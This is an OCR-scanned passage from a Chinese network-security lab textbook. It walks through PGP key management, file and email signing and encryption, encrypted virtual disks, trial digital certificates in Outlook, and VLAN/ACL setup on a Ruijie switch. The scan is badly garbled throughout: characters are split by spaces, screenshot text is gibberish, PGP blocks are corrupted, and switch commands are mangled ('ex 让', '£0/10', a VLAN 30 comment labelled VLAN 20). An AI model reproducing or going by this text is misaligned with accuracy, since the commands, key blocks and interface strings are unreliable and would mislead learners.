cmVykLWIt YW sLWVYuY29ka¥onQHBncCc5jb21wL3BtaWllBwsJCAcDAgoCGQEFGwIA 
AAADFgIBBRABAAAABBUICQoACgkQWWI OmN1aT jKmDwf +NmPOBhwY8Pq8TJ/VEHRT 
jvOdenHTHzHsF jnGWUSrKoVOzPkMANuHS jAw+t oNQAORSuOzw9cmC Wn 2zornk 
fwf VLkyUlbTkADhP jkEbRXiSsOUKfDnOLO91Grr6P4CUPhat 1hxuQLu+cxQZ5mHh 
AlrL14/FI8/xPeThnTdz6ijCWecOat5ri7TlwmI/ 93zy8H1JfWIiRPREBVWIiDS jpZu9 
J63BoS5QeRdspULNMeakPbDtnTWewjtBOWyOx906fq1ldGqduT jHETSSNniZP9S8hYG 
lHrLq5vFC1mKpYde8hzHFamMSfXKYz9jsiBPjSNDKYTpWhF aAUecH1wO9VBiPLI9 
+LkBDQARIBKMBAQgA2y753KVuehdNt] j8vsaBKGWiQeLf la96dmjjZAALPkoDwNta 
ay TOqnO9fxwET+HmuF sMepyt 31QSONUaJBXvlwmWRFeNkqldkiw3zqt ZuFQGcCXxh 
9KlrtRApORSOUOZ59/ 2tKMPOHLEbRnFOl1TzBv9NroFHIaedt 9W2VYSh0/r6j+95hE 
2YAtK4+aaxL4I3UQwdDih02/mnLH82mhApca0rmqVFLuRalCXmUKcobQ65bnlf4HWne 
T4kd1VtnCja+0ysSGqpdblmQti7TFiUFKQcnd73nbEnBmXEmnTg14/mB2o60&fv9h 
+DfWhBvUqhly8Npc02+fEZDUgktp5Qkdk2JETQARAQABiQEiBBgBAEANDQJIBKID 
BRsJLAAAAAAoJEF]pdJjdWudyLxQIAOLxAT5KWU+zD8FQGIwEdTo05cobiy8NgEE 
EpkJ+/3Ef94bnjKwLZYAJi2IV6ivhsVK5n98ZalfcLO4KVTZhesKudfAha6CVIs0z 
VcsFnEu8CPP/md0xBTKSNjD5TOWT1NsXDWbTyWY1VmRWVizWxJGcnvrIrJKZs2Vkz0 
wH8bQJNc9Fr3baimvalCT1ILo7E0EPCXwtTHZyQWwdySF3Rrkwn6C02HBrErn/bFDI 
iASyedftB6U/4jpjvDHCj+lLnzXoWohXJZqHzElBbtuquOx/uteeulnfnJ 8wnJoY 
UqwgbreS2T5dHLExW8szaeTRzyNThIXTifzBtnPgXqr3tP1Dy8k= 

=IQng 

一 ~--EID PGP PUBLIC KEY BLOCK 一 一 


图 15-10 ” 公 钥 的 内 容 


select keyls) 


Select the key(s) you would like to import to your keyring: 
Name Email 


必用 国 Leo c, Laporte (Petakma, CA, U5A -leoGleovae.com 9 


图 15-11 导入 公 钥 


a POPp Desktop * A Keys 
Ele Edt Yew Toos Keys tep 


全 Newperzp 2 veiypepzp 入 Shedfes 以 kesea Ssynckeys Fnd: 


| Name Emal valdty 


MyPrivate Keys 田 叶 ke sice@®126.com © 


以 Search for Keys 本 Leo c, Laporte (Petah [DT 站 
一 一 一 一 一 mY viongping pingxiong0l@126.com © 


Ba Emailthi Recpient 


Ph Emalths Key 


pepMessana 
15-12” 密 钥 显示 窗口 
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PGP Sign Key 


the selected user ID(s), you are certfying based on your own drect first-hand knowledge that the 
ee a peer ta ener 


Before signing, make sure the key(s) were given to you na secure manner by the owner or you have verified the 
Fingerprint wh the owner. 


KeyjUser Name Fingerprint 
leo 6. Laporte (Petaluma, CA, U5A.…，A6CB E898 FE77 CSBD 2C7E 8DDB D407 62E6 OCBF SE9D 


&l 
Bow sionature to be exported, Others may rely upon your sanature, 


记 seedee | Ca) Eee 己 t 


国 


图 15-13 ”信任 对 方 的 公 甸 


5. 数字 签名 及 验证 


PGP 也 可 以 完成 数字 签名 和 验证 的 过 程 。 用 私 钥 对 文件 进行 签名 ,验证 时 则 用 公 钥 。 
选择 要 签名 的 文件 , 单 击 右键 ,选择 PGP zip 一 sign, 出 现 如 图 15-14 所 示 的 对 话 框 。 
PGP Desktop - Enter Passphrase 


Signing key: 人 


xiongping <pingxiongn18126. com> (RSA/2046) 


The passphrase of the currently selected key has been cached 


15-14 选择 自己 的 私 钥 签 名 


选择 用 自己 的 私 钥 加 密 , 单 击 OK , 则 在 同一 个 目录 下 出 现 一 个 以 . sig 为 后 缀 的 签名 文 
件 , 此 签名 文件 和 原文 件 结合 使 用 。 验 证 时 ,双击 . sig 文件 , 主 窗 口 里 会 显示 此 文件 的 签名 
者 、 签 名 日 期 ,以 及 签名 是 否 有 效 。 如 果 该 文件 的 validity 属性 显示 为 绿色 圆 点 (如 图 15-15 
所 示 ), 则 表示 签名 有 效 。 


To verifcaton History 

和 Mlkeys KeyD Valdty soe 
忆 MyPrivateKeys A WX.bt xiongping <pingxiong1@... OxDDSAEE32 © 2006-4-1911;15:48 
以 Search for keys 


图 15-15 文件 通过 数字 签名 验证 


如 果 原 文件 被 破坏 ,例如 其 中 内 容 被 修改 , 则 验证 失败 (如 图 15-16 所 示 )。 


其 中 文件 名 前 面 出 现 红色 禁止 符号 ,并 且 validity 一 项 也 没有 绿色 圆 点 显示 。 表 明文 
件 已 经 被 破坏 ,验证 失败 。 


| © verifcation History | 


全 Mkeys Name Soner KeyID Valdty Signed 
BMyPrivate Keys 到 试 文件 .bt xiongping <pingxiong01@,,. 0xDDSAEE32 Bad Sonature 
以 Searchfor Keys 


图 15-16 文件 的 数字 签名 验证 失败 


注意 ,验证 签名 时 必须 拥有 签名 者 的 公 钥 ,否则 无 法 验证 。 
6. 加 密 、 签 名 邮件 


在 早期 的 版 本 中 ,PGP 在 安装 的 时 候 会 在 邮件 客户 端 Outlook 的 菜单 栏 中 产生 一 个 图 
标 , 当 邮 件 需 要 加 密 时 , 单 击 图 标 、 选 择 加 密 用 密 钥 就 可 以 完成 加 密 。 但 是 在 9. X 版 本 中 ， 
PGP 采 用 了 一 种 新 思路 : 把 PGP 作为 一 个 邮件 服务 器 来 转发 需要 加 密 、 解 密 的 邮件 。 很 多 
人 觉得 这 部 分 变 得 很 困难 , 没 法 正确 加 密 邮件 ,在 PGP 的 官网 论坛 中 ,被 问 到 最 多 的 问题 就 
是 邮件 加 密 如 何 设置 。 

(1) 设置 邮件 账户 。 让 PGP 自动 检测 到 邮件 账户 有 两 个 条 件 , 一 个 是 要 使 用 邮件 客户 
端 ,例如 Outlook, 如 果 使 用 Web 登录 , PGP 就 无 法 检测 。 另 一 个 条 件 是 必须 先 安装 
Outlook ,再 安装 PGP ,否则 就 检测 不 到 。 

当 PGP 安装 成 功 后 ,PGP Server 作为 一 个 服务 常 驻 内 存 ,Desktop 最 小 化 显示 在 托盘 
栏 ,能 自动 检测 邮件 客户 端 , 当 确定 用 此 账户 发 送 和 接收 的 邮件 需要 加 密 时 (如 图 15-17 所 
示 ),PGP 读 取 邮件 账户 中 的 pop、smtp 信息 ,自动 生成 一 个 邮件 代理 服务 。 


PCGP NEW SETVICE En 


Email Account Detected 


目 | PGP Desktop has detected an emal account and is able to secure this account by processing 
jo 国 同 国 Desktop 9 emal automatically as tis sent and received. 


Enable Service Should PGP process email account: zhutq@126,com ? 


Key Setup 
Key Generation 


Oes seare hs emal occound 


No do not secure this emall account 


Note: You may change your settings later from the PGP Desktop application. 


图 15-17 设 定 电子 邮件 账户 


注意 ,这 里 很 多 人 手工 填写 Server 信息 ,在 PGP 的 用 户 手 册 中 也 是 这 样 提示 的 ,但 是 
有 时候 ,手工 填写 Server 后 ,PGP 检测 不 到 账户 。 所 以 最 好 什么 都 不 填 , 等 待 PGP 自行 发 
现 账户 后 自动 填写 。 
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(2) 加 密 、 签 名 邮件 。 如 果 要 对 发 送 的 邮件 进行 加 密 , 就 选择 加 密 所 使 用 的 公 钥 ( 如 
图 15-18 所 示 ) ,这 里 的 公 钥 当然 是 收 信人 的 公 钥 。 


PGP New Service Assistant 


Select Key 
PGP can use one of your existing PGP Desktop keys. 


Slr Deskiopg 
Select a key from the list: 


| Chalce <aice@126.com> 


Enable Service 


Key Setup xiongping <pingxong0l@126.com> 


图 15-18 选择 加 密 的 公 钥 


如 果 要 对 发 送 的 邮件 签名 则 用 自己 的 私 钥 ( 注 意 , 所 有 牵涉 到 签名 的 地 方 都 是 用 自己 的 


私 钥 ) ,在 如 图 15-19 所 示 的 对 话 框 中 输入 签名 所 需 的 私 钥 密 码 。 
下 面 是 一 个 用 Outlook 来 写 信 并 加 密 和 签名 的 例子 。 发 送 成 功 后 ,托盘 栏 中 会 出 现 一 


个 提示 (如 图 15-20 所 示 ) ,表示 信件 已 经 被 加 密 后 发 送 。 


PGP Enter Passphrase foralisied Key 
Message was enctypted to the following pubfc key{s) : 


alice Caliced126. com> (RSA/2048) 
wionepine <pingrioned1@126, com> (RSA/2048) 


Show Keystokes 
Passphiase of dectyption key 


3 PGP Desktop Messaging 
Message tst encrypted to xiongping01@21cn com and signed 


Ca Came | = 本 
图 15-20 邮件 发 送 成 功 提示 


图 15-19 对 邮件 进行 签名 


被 PGP 加 密 后 的 邮件 内 容 如 图 15-21 所 示 。 
可 以 看 到 邮件 已 经 完全 变 成 了 密 文 。 当 然 ,这 个 密 文 是 用 Web 登录 到 邮箱 里 面 去 看 到 


的 ,如 果 用 Outlook 来 收 信和 的话,PGP 会 为 其 自动 解密 。 
接收 者 的 Outlook 在 接收 邮件 时 ,如 果 遇 到 加 密 的 邮件 ,PGP 会 使 用 相应 的 密 钥 解密 


(前 提 是 密 钥 已 经 存在 于 钥匙 环 中 ) ,解密 后 得 到 邮件 的 明文 (如 图 15-22 所 示 ), 并 标明 了 此 
邮件 的 加 密 者 和 签名 者 ,以 及 签名 的 日 期 。 


ER BEGIN PGP 了 严 SSAGE- 一 一 
Version: PGP Desktop 9.0.5 


qANQAR1DBwEwD tg SrkNPuODIBB /4qle6LbvL4Zb] 3ERmD78z210xWrszXwtWnBSTE 
9GZRceg8aydC71sz01GYtvCrd+BfTkc89d0Lz+tpounCL6BeY2LtWWJolIkrT/gfFr 
5y8RZuwG2WG3I7E7Scxs+jYJYFWO0Q40U5TqEfB/CnK7sFZ+jWGOZCh2kQX5+dax 
z0BPLArslWA3fp7arb47RJDylwxiIN5ro0rLXZHcU3TZ3IUAEyzqlsi8WeUPWIdHN 
寻 5IyTnlcdUhHzig6z3KSgNiVG+3rTFQabn336dTIkqny2HkFCjF9uIYOgrFmYQL 
Wadk3nJOpU7gX2H6hDmNqZJIVuH9Q+PWuWST5ojzbityytoInwcBIAAoYz7rZRANX 
AQgarBgxCyaPlwuHWJEzYktuN9yIFJxtHEFE8jKbHImBxY1DQDXc3E/IG2kg+L 贡 . 
UYU+5cQTc7Thdywi0hxRXWqW2wVIV5c1L1p/agnOFgi99yhLCgG1UPtOLj3DJio9e 
9i6JET7j+8BSs68ZguuSBakTVbIExzLFcxFCPIxRKEAfpEUSzY6Flmzua2atolG2SY 
te/Tp] jIFmpYr VHBOREL drHSMaW¥5ReRBZ8zEe6Dawk56AUuf Y21grA306t3UfEn 
8gREJJBGUZW]d26ZoJRIvEHtrwhuxuq3y+znZ6JIRN45E6bNPYYIBQBYYcYibr7TP 
REwrScWR2+E7Pp5xXj+ejdafNLAtgG6osYAG6ZTcsi5osoZIpYWEYPvZE2j7nsY 
ysUirn3Z48F&ntZI6ml6vTf jgkJhJ6jjX2n0x+fUOJFaz9EPtYlvq8/Ea30EKQDO 
tSTEHBW+ooRq+hq+a5UuU3KgrlpAtEEqGeBqGZW1IDL9wvtJFj8cHvpxgtQnTxFdj 
U3IQrv6cAs036wYqetYfY31jhBhiwaFZbN6cxqtujijTRieUsPeghuCiqlinTSQGY 
mlOXnmuanNREFEU+ QuHF trkfry? tphc ?hwnJERH1Y9xqH7fY1 2NyBBNr XQuBI 
omLOUJBD9YvrI7a62aDqLL5Jf1LBEYbyRyUJgrffYuaXGyuBqab+cKqW/A1Nno&wX 
YC5/fYaoJlcI6rwFQTDJsgi0Du4ZD5x29aJJShwhF6mcal3SfyKpbaq9lwfpAH4Y6 
RbIqHEUSSvUj82qlyNXWIWpviPOWcFWCrFKhZ7eYFgDbkTgXBfXxwIrP2YXEPDH6y 
yc1TcN93/4rDESHw 

=miJ2 

Re END PGP 严 3S4AGE- 一 一 


15-21 邮件 的 密 文 


xiongping [xiongping01@21cn. com] 
收 件 人 : xiongpinanl821cn com 


* PGP Signed 04/21/08 at 20:53:29, Decrypted 
Justatest 


* xiongping <xiongping01@21cn com> 
* 0xDD5AEE32 (L) 


图 15-22 邮件 的 明文 


如 果 利 用 Web 登录 ,也 可 以 解密 邮件 。 只 需 把 这 封 信 ( 密 文 ) 全 文 复制 ,在 托盘 栏 的 
PGP 图 标 上 单 击 右键 并 选择 Decrypt&Verify, 即 可 解密 剪贴 板 里 的 内 容 , 注 意 复制 的 时 候 
要 连同 密 文中 PGP 的 分 割 线 一 同 复制 。 


7. 创建 被 加 密 的 虚拟 磁盘 


PGP 可 以 利用 自己 的 密 钥 对 创建 一 个 或 者 多 个 虚拟 磁盘 ,通过 私 钥 进行 访问 。 那 么 用 
户 就 可 以 把 自己 的 机 密 文 件 存放 在 这 个 虚拟 磁盘 下 而 不 怕 别 人 用 自己 的 计算 机 的 时 候 看 
到 了 。 

具体 方式 如 下 : 利用 PGP 的 PGP Disk 菜单 下 的 New Virtual Disk( 新 建 虚拟 磁盘 ) 命 
令 可 以 建立 虚拟 磁盘 。 然 后 设置 磁盘 大 小 和 访问 密码 (如 图 15-23 所 示 ) 。 

最 后 生成 新 的 虚拟 磁盘 。 此 磁盘 操作 和 普通 磁盘 一 样 ,只 是 访问 的 时 候 需 要 输入 密码 ， 
这 样 可 以 保证 其 他 人 在 不 知道 密码 的 情况 下 无 法 访问 ,保证 数据 的 机 密 性 。 

当 不 需要 用 到 它 的 时 候 则 可 以 在 磁盘 上 单 击 右键 , 选 择 unmount disk, 磁盘 就 会 
消失 。 
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全 CPUDESROP Untitled 
Ele ER Yew Imok Dk bep 


加 wrezp 从 wwrem 国 amnee 太一 


TREE une 


Dalkeys 
BMy private keys 


es 
PPP Do sres nd settnss\zh ea\My DocumentsiNe| ma 
so EC CD 
Availsble Space: C:\ (B03.2 MB) 
加 MountatStarip 
Virtual Disk Authentication 
Secure with: 
FE 
和 
Confrm Passphrase， 


Show Keystrokes 到 


图 15-23 设置 虚拟 磁盘 


15.1.3 思考 题 


1. 如 何 用 PGP 加 密 文档 里 面 的 一 段 文字 ? 
2. PGP 采用 的 是 何 种 加 密 体制 ? 


152 数字 证 书 与 加 密 认证 
152.1 实验 目的 、 环 境 及 背景 知识 


1. 实验 目的 


熟悉 和 掌握 CA 认证 的 基本 原理 ; 了 解数 字 证 书 的 基本 内 容 , 熟 练 掌握 数字 证 书 的 申 
请 和 使 用 过 程 。 


2. 实验 环境 


硬件 : 主流 配置 计算 机 , 连 入 Internet。 
软件 : 安装 Windows 2000/2003/XP 操作 系统 ,安装 Outlook。 


3. 背景 知识 
数字 证 书 是 由 权威 公正 的 第 三 方 机 构 即 CA 中 心 签发 的 .一 串 很 长 的 包含 有 客户 基本 
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信息 及 CA 签字 的 数学 编码 。 其 关键 内 容 为 客户 和 客户 的 标识 所 拥有 的 公 钥 信息 。 

以 数字 证 书 为 核心 的 加 密 技术 可 以 对 网 络 上 传输 的 信息 进行 加 密 和 人 解密、 数字 签名 和 
签名 验证 ,确保 网 上 传递 信息 的 机 密 性 、 完 整 性 ,以 及 交易 实体 身份 的 真实 性 ,签名 信息 的 不 
可 否认 性 ,从 而 保障 网 络 应 用 的 安全 性 。 

目前 ,根据 其 用 途 , 分 成 了 服务 器 端 SSL 证 书 和 客户 端 数字 证 书 。 服 务 器 端 SSL 证 书 
用 于 服务 器 身份 的 确定 ,主要 用 途 就 是 为 网 站 的 机 密 数 据 提供 加 密 传输 功能 ,从 而 确保 机 密 
信息 的 机 密 性 、 完 整 性 和 不 可 否认 性 。 客 户 端 数字 证 书 颁发 给 网 络 应 用 中 的 客户 端 ,分 个 人 
证 书 和 单位 证 书 , 绑 定 电子 邮件 账号 ,主要 用 于 电子 邮件 加 密 和 签名 、 客 户 端 身份 认证 以 及 
PDF 文件 签名 等 。 个 人 证 书证 明 个 人 身份 ,而 单位 证 书证 明 单 位 身份 。 


1522 实验 步骤 


1. 个 人 数字 证 书 的 申请 


通过 使 用 免费 数字 证 书 , 可 以 了 解 专业 数字 证 书 的 相关 技术 。 获 得 免费 数字 证 书 的 方 
法 有 很 多 ,目前 国内 有 很 多 CA 中 心 提 供 试用 型 数字 证 书 , 其 申请 过 程 在 网 上 即时 完成 ,并 
可 以 免费 使 用 。 下 面 提供 一 个 比较 好 的 站 点 ,申请 地 址 为 https://testca. netca. net, 在 主页 
上 单 击 “ 安 装 证 书 ”, 进 入 下 一 个 页 面 ,选择 “安装 试用 CA 证 书 链 ”。 按 提示 要 求 操作 ,填写 
申请 表单 (如 图 15-24 所 示 )。 


六 写 并 提 葡 外 放 来 交 甲 请 试用 型 个 玉 数 于 证 包 耻 不 省 电 了 丙 男 认证 有 限 人 可“WNETOsOTT TNTerner EPI7er 


加 区 
文件 锦 穆 E) 查看 VV) 收藏 (4) 工具 (D 帮助 蚌 


所 -日 - 国 国 的 用 暴 次 mx 加 启 - 交 旧 : 四 
BED) hitps:Nestca netca net/apply indind fl asp7Browser Type=Microsoft 20Interret 20E plorer 加 [Dba 


团 喇 。 申请 试用 型 个 人 数字 证 书 


IF 全 4、 黄 写 并 提交 申请 表格 2、 下 者 并 家装 黎 的 数字 证 节 


您 的 基本 信息 


请 输入 以 下 各 栏 信息 ， 不 可 填写 特 艾 字符 。 所 有 的 信息 大 需要 正确 填写 ， 否 刚 格 无 法 元 成 下 面 的 申请 步 
.2 


ee 
5 

en 
mr | 


请 给 入 你 的 电子 邮件 培 址 - 
(FN: aaacace set) my 


i A Se 站 


BBE 自 国 intemet 


15-24 ”填写 申请 表格 
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按照 表单 上 的 提示 ,输入 完整 的 个 人 资料 ,包括 电子 邮件 地 址 。 选 择 加 密 服 务 提供 程序 
(Cryptographic Service Provider,CSP) ,其 中 ,CSP 负责 创建 密 钥 .吊销 密 钥 ,以 及 使 用 密 钥 
执行 各 种 加 、 解 密 操 作 。 每 个 CSP 都 提供 了 不 同 的 实现 方式 。 某 些 提供 了 更 强大 的 加 密 算 
法 ,而 另 一 些 则 包含 硬件 组 件 , 例 如 智能 IC 卡 或 USB 电子 令 牌 。 

选择 Microsoft Base Cryptographic Provider v1.0。 申 请 完毕 后 会 显示 如 图 15-25 所 示 


有 请 试用 


文件 吕 。 编辑 (E) ”查看 (W) 收 套 (A) 工具 (D 帮助 (HD) 


[3 
@ 扣 -日 - 国 国 的 Ps 六 wx @ 人 :学 利 - 国 
地 Ht(D) | 乔 httpsi/jtestca.netca.netjapply_indilnd_success.asp mI>E 


网 地 申请 试用 型 个 人 数字 证 书 


1、 填 写 并 提交 申请 表格 上 0 全 2z、 下 雪 并 安装 你 的 数字 证 书 


略 们 已 经 芝 理 了 您 的 请 求 并 为 您 签发 了 证 书 ， 下 面 是 您 的 证 书 业务 受理 导 ， 下 载 证 书 时 要 用 到 该 号 码 和 
密码 ， 密码 已 翅 发 往 您 的 邮箱 isagpiag01821ca_ <omv 


您 的 证 书 业务 受理 号 ( 请 第 记 ) : 0102-20080420-000020 
[ 委 时 证 书 ] 
玛 回 页 前 轩 
四 2002~~2009 广东 省 电子 商务 认证 有 限 公司 版 权 所 有 


系 加 建设 挫 护 与 技术 支持 ; 三 东 省 虹 子 商务 认证 有 限 公司 
加 有 有 建议 惑 意见 ， 欢 迎 发 全 到 serviceQenca net 


图 15-25 “申请 完毕 页 面 
2. 安装 证 书 


打开 自己 的 E-mail 信箱 ,里 面 会 有 CA 中 心 发 送 过 来 的 业务 受理 号 和 对 应 密码 。 
回 到 申请 页 面 , 单 击 页 面 下 方 的 “安装 证 书 ” 按 钮 ,输入 业务 受理 号 和 密码 (如 图 15-26 
所 示 ) 。 


DR 
文件 加。 抱 考 (E) 查看 (路 本 (a&) 工具 (D 入 肋 t) 

四 与 -回国 国 的 Per mx @ 人 -学 回 - 国 

地 址 (D) 疙 Mtpsi/Nestca natca.netidownloadfiogn. asp7Browser Type=Microsoft Ye20Intermet 20Erplorer 


[FE 风 证 通 
hr 安装 数字 证 书 


安装 数字 证 书 身份 校 验 


在 安装 我 们 为 您 答 发 的 数字 证 书 之 前 ， 基 要 您 提交 相应 的 信息 以 验证 次 的 身份 。 请 输入 您 的 证 书 业务 受 
理 号 和 密码 ,进入 安装 数字 证 书页 面 。 


加 果 修 右 记 证 书 业务 委 理 号 及 密码 ,请 从 邮件 中 取 同 将 证 书 业 务 过 天 号 及 密码 填 入 后 ， 点击" 确定 " 控 
钮 ,进入 安装 证 书页 面 。 


入 的 证 书 业务 受理 导 : 0100-2009042D-000020 
SEH: eeeeeee 


匡 司 区 要 


15-26 ”安装 证 书 
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输入 正确 后 则 会 显示 成 功 安装 信息 。 
3. 在 IE 中 查看 数字 证 书 


通过 IE 浏览 器 自 带 的 管理 器 查看 数字 证 书 。 

首先 打开 Internet Explorer, 单 击 “ 工 具 ” 菜 单 中 的 “Internet 选项 ”。 选 取 “ 内 容 ” 选 项 
卡 , 单 击 “ 证 书 ” 按 钮 来 查看 信任 的 当前 证 书 的 列表 。 

单 击 “ 个 人 ”选项 卡 可 以 查看 已 经 申请 的 个 人 数字 证 书 ( 如 图 15-27 所 示 )。 

这 里 的 个 人 证 书 里 面 就 包含 了 刚才 申请 并 且 安 装 好 的 证 书 , 由 于 为 试用 版 ,使 用 日 期 为 
三 个 月 。 选 择 个 人 证 书 ,然后 单 击 “ 查 看 ”, 可 以 看 到 证 书 的 详细 信息 (如 图 15-28 所 示 )。 


3 预 贿 目 的 (N); 


TX [BA [PE RR E22 | 


- 从 
Er . i 
CN 目 000 
Co 2006 年 7 月 19 日 13:55:59 


61 MD la wp 04d 64 1d 3 
KeyID=21 24 89 £6 Ob 94 


证 韦 的 和 和 央 目的 


图 15-27 查看 证 书 图 15-28 证 书 的 详细 信息 


4. 电子 邮件 的 加 密 


打开 Outlook 后 ,首先 需要 导入 证 书 ,选择 “工具 ”>“ 选 项 ”, 选 择 “ 安 全 "标签 。 选 中 “加 密 
待 发 邮件 的 内 容 和 附件 "和 “给 待 发 邮件 添加 数字 签名 ”( 如 图 15-29 所 示 ) ,然后 单 击 “ 设 置 ”。 


,下 法 参数 | 地 件 设置 | 部件 格式 | 拼写 检查 安全 。 .其 好 
加 衬 电 


| 回 jn 本 生发 邮 生 的 内 容 和 再 件 四 
LE 回 结 竺 发 邮件 二 加 歼 字 答 名 ) 


rors 
口 对 所 有 SAITIE 答 名 邮件 要 求 S/WTwE 回执 @) 
MAME): |xienepine 回 


城 
安全 区 城 用 于 自 定义 是 否 可 在 HTNL 邮件 中 运行 竺 本 和 活动 内 容 。 


bl E23 ~ EE 


数字 标识 钙 书 ) A 
国 汶 字 标识 或 证 忆 是 一 种 可 让 任 在 电子 商务 中 证 实 身 份 的 文档 。 


记忆 CE 
15-29 设置 安全 属性 
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选择 “签名 证 书后 会 出 现 证 书 栏 ,选择 签名 和 加 密 需 要 用 到 的 证 书 , 并 且 选 中 最 下 面 的 


“将 证 书 与 签名 邮件 一 起 发 送 ”, 单 击 “确定 ”如 图 15-30 所 示 ) 。 


更 丰 安全 设 四 


回 将 正 书 与 签名 邮件 一 同 发 关外) 


CE | ] 


图 15-30 更 改 安全 设置 


在 撰写 邮件 后 ,注意 选择 回回 ,表示 数字 签名 和 加 密 。 
1523 思考 题 


1. 使 用 数字 证 书 和 PGP 的 公 钥 交换 相 比较 有 何 优点 ? 
2. 邮件 接收 方 解 密 和 验证 签名 是 否 需 要 证 书 ? 


153 配置 访问 控制 列表 
15.3.1 实验 目的 、 环 境 及 背景 知识 


1. 实验 目的 
掌握 在 交换 机 上 配置 访问 控制 列表 的 方法 。 
2. 实验 环境 


在 某 学 校 的 校园 网 内 部 ,有 一 台 三 层 交换 机 锐 捷 S3550-24 连 着 学 校 的 WWW 和 
FTP 服务 器 ,另外 还 连 着 学 生 宿 舍 楼 和 教工 宿舍 楼 ,现在 要 求 在 该 交换 机 上 通过 访问 控 
制 列 表 的 配置 ,使 学 生 只 能 访问 FTP 服务 器 ,不 能 访问 WWW 服务 器 ,教工 则 没有 这 个 


限制 。 
在 实验 环境 中 ,用 一 台 主 机 模拟 学 生 宿舍 区 的 用 户 , 用 一 台 主 机 模拟 教工 宿舍 


区 的 用 


户 , 再 用 一 台 主 机 模拟 服务 器 ,因此 实验 设备 包括 : 锐 捷 S3550-24 交换 机 一 台 , 主 流 配置 计 


算 机 3 台 , 直 连 线 三 根 , 实 验 环境 如 图 15-31 所 示 。 


3. 背景 知识 
WWWFTP 


1) 交换 机 的 配置 模式 服务 器 
对 交换 机 进行 配置 的 命令 有 四 层 模式 : 用 户 模 
式 、 特 权 模 式 、 全 局 模式 和 端口 模式 。 每 一 层 模式 下 
包含 的 命令 不 同 ,所 能 实现 的 配置 功能 也 不 同 。 en 
(1) 用 户 模式 ， 和 交换 机 连接 上 之 后 ,就 进入 时- 口 
[ 各]| 


192.168.10.0 


F0/15® FO/10 己 
了 命令 配置 的 最 外 层 模式 ,这 就 是 用 户 模式 。 在 卫 - 记 本 和 
该 模式 下 仅仅 可 以 查看 交换 机 的 软 、 硬 件 版 本 信 
息 , 并 进行 简单 的 测试 。 该 模式 下 的 命令 提示 符 图 15-31 实验 拓扑 结构 


是 switch>。 

(2) 特权 模式 : 由 用 户 模 式 进 入 更 内 一 层 模式 , 即 特权 模式 。 特 权 模式 下 可 以 对 交换 
机 的 配置 文件 进行 管理 ,查看 交换 机 的 配置 信息 ,进行 网 络 的 测试 和 调试 等 。 特 权 模式 下 的 
命令 提示 符 是 switch# 。 

(3) 全 局 配置 模式 : 由 特权 模式 进入 更 内 一 层 模 式 , 即 全 局 配置 模式 。 该 模式 下 可 以 
配置 交换 机 的 全 局 性 质 参 数 ,如 主机 名 ,登录 信息 等 。 全 局 模式 下 的 命令 提示 符 是 switch 
(config)#。 

(4) 端口 模式 : 由 全 局 配置 模式 进入 更 内 一 层 模式 , 即 端 口 模式 。 该 模式 下 可 以 对 交 
换 机 的 端口 进行 参数 配置 ,其 命令 提示 符 是 switch(config-if) # 。 

在 以 上 任何 一 种 模式 下 都 可 以 通过 输入 “?” 来 显示 当前 模式 下 的 全 部 可 执行 的 命令 及 
其 解释 。 

2) ACL 

访问 控制 列表 ACL(Access Control List) 最 直接 的 功能 就 是 包 过 滤 。 通 过 访问 控制 列 
表 可 以 在 路 由 器 三 层 交 换 机 上 进行 网 络 安全 属性 的 配置 ,实现 对 进入 路 由 器 、 三 层 交 换 机 
的 数据 流 进行 过 滤 。 

控制 数据 流 的 定义 可 以 基于 网 络 地 址 、TCP/UDP 的 应 用 等 ,可 以 选择 对 于 符合 过 滤 标 
准 的 流 是 丢弃 还 是 转发 ,因此 必须 知道 网 络 是 如 何 设计 的 ,以 及 路 由 器 接口 是 如 何在 过 滤 设 
备 上 使 用 的 。 

ACL 分 为 标准 访问 控制 列表 和 扩展 访问 控制 列表 。 其 中 ,标准 访问 控制 列表 仅 可 以 根 
据 数据 包 的 源 IP 地 址 定义 规则 ,进行 数据 包 的 过 滤 。 扩 展 访 问 控制 列表 则 可 以 根据 数据 包 
的 源 IP、 目 的 IP、 源 端口 .目的 端口 、 协 议 来 定义 规则 ,进行 数据 包 过 滤 。 

访问 控制 列表 的 标识 可 以 是 数字 编号 ,也 可 以 是 用 户 来 命名 。 如 果 进 行 编号 ,那么 标准 
访问 控制 列表 的 编号 范围 是 1 一 99、1300 一 1999 ,扩展 访问 控制 列表 的 编号 范围 是 100 一 
199、2000 一 2699 。 


1532 实验 步骤 


1. 连接 交换 机 


交换 机 的 配置 线 缆 将 主机 与 交换 机 的 console 端口 连接 ,然后 通过 “超级 终端 ”建立 
主机 与 交换 机 的 连接 ,如 图 15-32 所 示 。 
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图 15-32 建立 与 交换 机 的 连接 


输入 连接 名 ,选择 连接 端口 ,并 将 端口 的 通信 速率 设置 为 9600。 
2. 基本 配置 


建立 连接 之 后 ,进入 超级 终端 命令 窗口 ,命令 提示 符 显示 switch 二 , 即 处 于 交换 机 的 用 
户 模 式 , 输 入 用 户 名 和 密码 ,进入 全 局 配置 模式 ,开始 配置 。 创 建 三 个 VLAN: VLAN10、 
VLAN20、VLAN30。 服 务 器 属于 VLAN10, 教 工区 的 主机 属于 VLAN20, 学 生 区 的 主机 属 
于 VLAN30。 给 每 个 VLAN 创建 虚拟 接口 ,并 设置 虚拟 接口 的 IP 地 址 ,参考 实验 拓扑 图 。 


S3550 — 24(config)# vlan 10 

S3550 — 24(config— vlan)# name server ! 建立 VLAN 10, 并 命名 为 server 
S3550 - 24(config— vlan)# ex 让 

S3550 — 24(config)# vlan 20 

S3550 — 24(config- vlan) # name teacher ! 建立 VLAN 20, 并 命名 为 teacher 
S3550 - 24(config— vlan)# exit 

S3550— 24(config)# vlan 30 


S3550 — 24(config— vlan)# name students ! 建立 VLAN 20, 并 命名 为 students 
S3550 ~ 24(config— vlan)# exit 
S3550 — 24(config)# interface f0/5 ! 进入 5 号 端口 的 配置 模式 


S3550 - 24(config— if)# switchport mode access 

S3550 一 24(config 一 if) 间 switchport access vlan 10 ! 将 该 端口 划分 给 VLAN 10 

S3550 - 24(config— if)# exit 

S3550 - 24(config) # interface £0/10 ! 进入 10 号 端口 的 配置 模式 
S3550 — 24(config— if)# switchport mode access 

S3550 一 24(config 一 if)# switchport access vlan 20 ! 将 该 端口 划分 给 VLAN 20 

S3550— 24(config— if)# exit 

S3550 - 24(config) # interface f0/15 ! 进入 15 号 端口 的 配置 模式 
S3550 - 24(config— if)# switchport mode access 

S3550 - 24(config- if)# switchport access vlan 30 ! 将 该 端口 划分 给 VLAN 30 

S3550 - 24(config— if)# ex 让 

